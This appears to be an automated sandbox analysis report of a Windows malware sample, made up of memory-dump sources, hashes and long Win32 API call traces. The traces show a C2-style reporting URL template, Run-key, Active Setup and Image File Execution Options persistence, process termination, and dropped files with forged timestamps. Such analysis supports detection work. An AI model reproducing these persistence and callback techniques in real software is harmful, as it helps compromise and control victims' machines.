                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: closesockethtonslstrcpylstrlensocketwsprintf
                                                                                                                                                                      • String ID: 12@$http://%s/d/rpt?%s$urlinj_creat
                                                                                                                                                                      • API String ID: 4197103552-2858504077
                                                                                                                                                                      • Opcode ID: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                      • Instruction ID: 88ec9d7906897b8114724b1b79faff9a7f04a0d329b8cb3f5de5d04a505f717c
                                                                                                                                                                      • Opcode Fuzzy Hash: f9e1d899c8cb631e133cdf2d4e1ab3e6813410de5d1cdf2efe6631ca7b0b0578
                                                                                                                                                                      • Instruction Fuzzy Hash: ECE06DB160525017E310B669AC86BDB268C9B44388F50453EBB49B32C6E9BDAC4086AA
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004026B1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: select
                                                                                                                                                                      • String ID: (
                                                                                                                                                                      • API String ID: 1274211008-3887548279
                                                                                                                                                                      • Opcode ID: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                      • Instruction ID: 6522e2537fb8c8e721883018bf3c6a7a4605c561a93ab5d2b210f47b7f02e7dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                      • Instruction Fuzzy Hash: 094172341083859BD3318F24C588BEBFBE4EB89314F24492FD8D9972C2D3B99865CB56
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00403A27
                                                                                                                                                                      • GetVersionExA.KERNEL32(004120D0), ref: 00403A43
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00403A74
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407014), ref: 00403AA2
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403ACC
                                                                                                                                                                      • GetCommandLineA.KERNEL32(00000104), ref: 00403AD4
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403AF2
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00403B09
                                                                                                                                                                      • Process32First.KERNEL32(?,?), ref: 00403B32
                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00403B6A
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 00403B7B
                                                                                                                                                                      • Process32Next.KERNEL32(?,?), ref: 00403B94
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403BAC
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000FF), ref: 00403BB5
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403BC2
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403BE9
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00403BF6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0040702B), ref: 00403C23
                                                                                                                                                                      • LoadLibraryA.KERNEL32(0040703E,?,?,?,?,?,?,?,00000104), ref: 00403C86
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407048), ref: 00403C96
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407060), ref: 00403CA6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407075), ref: 00403CB6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407086), ref: 00403CC6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00407099), ref: 00403D13
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004070AC), ref: 00403D2E
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00403E2B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,004070C4), ref: 00403E50
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000104), ref: 00403E7F
                                                                                                                                                                      • WSAStartup.WS2_32(00000002,?), ref: 00403E97
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403E9F
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00000104), ref: 00403EA6
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00403EAD
                                                                                                                                                                      • LoadLibraryA.KERNEL32(004070D7,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00403EDA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RasEnumConnectionsA), ref: 00403F01
                                                                                                                                                                      • LoadLibraryA.KERNEL32(004070F8), ref: 00403F34
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetIpAddrTable), ref: 00403F5B
                                                                                                                                                                      • LoadLibraryA.KERNEL32(004071C0), ref: 00403FD9
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 00404042
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00404052
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 00404062
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetSetOptionA), ref: 00404072
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 00404082
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404347
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000), ref: 00404366
                                                                                                                                                                      • ReadFile.KERNEL32(?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404386
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004120C0,00000010,?,00000000,?,?,00000002,00000000), ref: 00404392
                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00100978), ref: 0040445F
                                                                                                                                                                      • wsprintfA.USER32 ref: 004044BC
                                                                                                                                                                      • CreateMutexA.KERNEL32(0040F4FC,00000001,0040F48A,?,?,?,?,?,?,?,?,00000000), ref: 004044D0
                                                                                                                                                                      • GetLastError.KERNEL32(0040F48A,?,?,?,?,0040F48A,?,?,?,?,?,?,?,?,00000000), ref: 004044E4
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00404506
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,0040751C,?,?,?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 00404532
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,0040751C,?,?,?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 0040453E
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 0040456E
                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 0040458C
                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00100978), ref: 004045C1
                                                                                                                                                                      • OpenProcess.KERNEL32(00100201,00000000,?), ref: 004045DE
                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00404603
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00404613
                                                                                                                                                                      • SetPriorityClass.KERNEL32(?,00000040), ref: 00404633
                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00404658
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00100979,00001388), ref: 0040468F
                                                                                                                                                                      • CloseHandle.KERNEL32(00100979,00001388), ref: 00404698
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004046BC
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000080), ref: 004046C5
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,0040F4A0,00000000,00020019,?,?,?,?,?,?,?,?,0040F48A), ref: 004046F4
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,0040F4A0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040472B
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,0040F4EE,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000), ref: 00404766
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00404790
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000012,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004047A1
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000002,0040F4A0), ref: 004047BA
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040F4FC,?,00000000), ref: 004047CC
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 004047E2
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0040F48A,?,?,?,?,0040F48A), ref: 00404804
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,0040F4A0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,0040F48A), ref: 0040484E
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,0040F4A0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 0040487A
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,0040F508,00000000,00000000,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,0040F48A), ref: 004048B1
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040F508,00000000,00000003,004120C4,0000000C,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 004048D7
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,004120C4,?,?,?,0040F4FC,?,00000000,?,?,?,0040F48A), ref: 004048E9
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00407347,?,00000104,?,?,?,?,?,?,?,004120C4,?,?,?,0040F4FC,?), ref: 00404906
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404925
                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404954
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004120C4,?), ref: 00404963
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00404998
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000100,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 004049A9
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00100978,?,00411030,?,00000100,?,?,00000104), ref: 004049B0
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00407351,?,?,?,?,?,?,00000104), ref: 004049E6
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00100978,?,00407351,?,?,?,?,?,?,00000104), ref: 004049ED
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,00407351,?,?,?,?,?,?,00000104), ref: 004049FC
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,0040736E,?,?,?,?,?,?,?,?,?,00407351), ref: 00404A2B
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00100978,?,0040736E,?,?,?,?,?,?,?,?,?,00407351), ref: 00404A32
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,?,0040736E,?,?,?,?,?,?,?,?,?,00407351), ref: 00404A48
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404A8F
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AA9
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC3
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,004120C0,00000004,?,00000000,?,?,00000002,00000000,?,?,00000100,?,?,00000104), ref: 00404AC9
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,?,?,00000100,?,?,00000104), ref: 00404AF2
                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B1E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B27
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B3C
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B48
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00404B55
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404B75
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000100,?,?,00000104), ref: 00404B7F
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000104), ref: 00404BA5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404BC3
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404BF8
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404C04
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00001000,00401379,?,00000000,?), ref: 00404C3F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404C48
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00404C95
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404CB5
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404CC6
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00100568,?,00411030,?,00000104), ref: 00404CCD
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404CF3
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00000104), ref: 00404D0F
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00000104), ref: 00404D1E
                                                                                                                                                                      • Sleep.KERNEL32(000007D0,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D30
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D48
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404D63
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,0040F580,00000C00,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404D9D
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404E01
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E3B
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00404E74
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00404EA9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00404EB8
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404ED7
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,00407379,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404EEB
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404F03
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407379,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F1E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 00404F42
                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00404F72
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F98
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404FB5
                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00404FD2
                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00404FDE
                                                                                                                                                                      • wsprintfA.USER32 ref: 00405088
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050C3
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,{4D415259-4a4f-4e45-5334-4D4152594a4f},?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050CE
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 004050E4
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040510D
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030), ref: 0040511E
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00100928,?,00411030), ref: 00405125
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 0040514B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00411030), ref: 00405167
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00411030), ref: 00405176
                                                                                                                                                                      • Sleep.KERNEL32(000007D0,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 00405188
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 004051A0
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004051BB
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00410200,00000800,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004051F5
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 0040525A
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405291
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004052CB
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00405300
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040530F
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040532E
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00407382,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000000), ref: 0040536A
                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000004,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00405373
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,0040738E,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040538E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 004053B2
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,?), ref: 004053C7
                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,0040751C), ref: 004053F3
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,0040751C), ref: 00405402
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 00405445
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405464
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00405480
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000080), ref: 00405489
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054B0
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004054CE
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004054ED
                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040551E
                                                                                                                                                                      • lstrcpyA.KERNEL32(?), ref: 004055C0
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?), ref: 004055D5
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(0040736E,?,00000104,?,?,?), ref: 00405610
                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104,?,?,?), ref: 0040562C
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?), ref: 0040564B
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,00000104,?,?,?), ref: 00405673
                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,?,?,?,?,00000104,?,?,?), ref: 00405693
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000104,?,?,?), ref: 004056B6
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056EA
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056F6
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000), ref: 00405715
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405760
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405771
                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00100770,?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405778
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00100770,?,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 00405783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00411030,?,00000104), ref: 0040579E
                                                                                                                                                                      • WriteFile.KERNEL32(?,00407C80,00001400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 004057DC
                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 0040580A
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405819
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 0040586E
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(0040736E,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058AC
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058BB
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058C6
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080), ref: 004058E1
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080,00000000,00411030), ref: 004058FD
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 0040591B
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405927
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405932
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 0040594D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080,00000000), ref: 00405969
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040599B
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(0040736E,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059C0
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059CF
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 004059DA
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104), ref: 004059F5
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A27
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A33
                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A50
                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A5C
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A67
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 00405A82
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405AB4
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104), ref: 00405AC0
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00006400,?,00000000), ref: 00405AF8
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405B2E
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00405B4F
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405B79
